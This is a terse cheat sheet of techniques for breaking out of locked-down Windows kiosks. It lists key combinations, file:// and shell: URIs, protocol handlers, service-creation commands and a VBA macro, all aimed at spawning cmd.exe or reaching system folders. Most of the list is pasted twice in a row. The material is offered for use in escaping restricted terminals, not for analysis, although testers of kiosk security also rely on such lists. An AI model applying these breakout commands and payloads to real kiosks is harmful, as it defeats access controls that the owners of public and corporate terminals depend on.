Thngs to try to escape the kiosk (from HitThemLow):
CTRL-SHIFT-ESC Task manager
ALT-TAB Switch Task
CTRL-ALT-DELETE Task Manager
SHIFT*5 Sticky Keys
ALT-F4 Close application
Windows Key Start menu
In the browser:
File:/C:/windows
File:/C:\windows\
File:/C:\windows/
File:/C:/windows
File://C:/windows
File://C:\windows/
file://C:\windows
C:/windows
C:\windows\
C:\windows
C:/windows/
C:/windows\
%WINDIR%
%TMP%
%TEMP%
%SYSTEMDRIVE%
%SYSTEMROOT%
%APPDATA%
%HOMEDRIVE%
%HOMESHARE%
Keycombos for in the browser:
CTRL-B, CTRL-I Favourites
CTRL-H History)
CTRL-L, CTL 0 File/Open Dialog
CTRL-P Print Dialog
CTRL-S Save As
Mash the keyboard to try and find others that may be hidden (admin menues)
Use the "about" protocol to try and access things:
about:<input%20type=file>
about:<a%20href=C:\windows\>Click-Here</a>
use the "shell" protocol to access executables
Shell:Profile
Shell:ProgramFiles
Shell:System
Shell:ControlPanelFolder
Shell:Windows
shell:::{21EC2020 3AEA 1069 A2DD 08002B30309D} //WIndows Control Panels ClassID
Dont forget iKat !!
Javashells and the res: protocol are good :)
Other protos to try:
Callto://
Gopher://
HCP://
Telnet://
TN3270://
Rlogin://
LDAP://
News://
Mailto://
MMS://
SKYPE://
SIP://
Play://
Steam://
Quicktime://
smb://
ftp://
You can use HCP to spawn a cmd.exe
You can embed files in .doc files and kiosks dont usually stop thar ;)
More things:
Jython Shell
Java applets
activex (object.execute('cmd.exe'))
.NET CLR
flash filereference()
Notepad can open remote files
Other ways to spawn a shell
cmd.exe
command.com
win.com
cmd.exe
win.com
command.com
Loadfix.com start.exe
sc create testsvc binpath= loadfix.com cmd.exe loadfix.com command.com
"cmd /K start type= own cmd start" type type= interact
start loadfix.com cmd.exe
start loadfix.com
start loadfix.com %COMSPEC%
command.com
cmd.exe
also firefox -
If you want to make quick and dirty HTML in FireFox use the address-bar like:
data:text/html,Click-Here</a>
also note to self, don't forget
CTRL-SHIFT-ESC Task manager
ALT-TAB Switch Task
CTRL-ALT-DELETE Task Manager
SHIFT*5 Sticky Keys
ALT-F4 Close application
Windows Key Start menu
In the browser:
File:/C:/windows
File:/C:\windows\
File:/C:\windows/
File:/C:/windows
File://C:/windows
File://C:\windows/
file://C:\windows
C:/windows
C:\windows\
C:\windows
C:/windows/
C:/windows\
%WINDIR%
%TMP%
%TEMP%
%SYSTEMDRIVE%
%SYSTEMROOT%
%APPDATA%
%HOMEDRIVE%
%HOMESHARE%
Keycombos for in the browser:
CTRL-B, CTRL-I Favourites
CTRL-H History)
CTRL-L, CTL 0 File/Open Dialog
CTRL-P Print Dialog
CTRL-S Save As
Mash the keyboard to try and find others that may be hidden (admin menues)
Use the "about" protocol to try and access things:
about:<input%20type=file>
about:<a%20href=C:\windows\>Click-Here</a>
use the "shell" protocol to access executables
Shell:Profile
Shell:ProgramFiles
Shell:System
Shell:ControlPanelFolder
Shell:Windows
shell:::{21EC2020 3AEA 1069 A2DD 08002B30309D} //WIndows Control Panels ClassID
Dont forget iKat !!
Javashells and the res: protocol are good :)
Other protos to try:
Callto://
Gopher://
HCP://
Telnet://
TN3270://
Rlogin://
LDAP://
News://
Mailto://
MMS://
SKYPE://
SIP://
Play://
Steam://
Quicktime://
smb://
ftp://
You can use HCP to spawn a cmd.exe
You can embed files in .doc files and kiosks dont usually stop thar ;)
More things:
Jython Shell
Java applets
activex (object.execute('cmd.exe'))
.NET CLR
flash filereference()
Notepad can open remote files
Other ways to spawn a shell
cmd.exe
command.com
win.com
cmd.exe
win.com
command.com
Loadfix.com start.exe
sc create testsvc binpath= loadfix.com cmd.exe loadfix.com command.com
"cmd /K start type= own cmd start" type type= interact
start loadfix.com cmd.exe
start loadfix.com
start loadfix.com %COMSPEC%
command.com
cmd.exe
also firefox -
If you want to make quick and dirty HTML in FireFox use the address-bar like:
data:text/html,Click-Here</a>
also note to self, don't forget
Sub macro1()
'
' shell Macro
'
'
Dim sPath As String
sPath = "c:windows"
'retVal = shell("explorer.exe" & sPath, vbNormalFocus)
retVal = shell("C:\\windows\\system32\\cmd.exe", vbNormalFocus)
End Sub
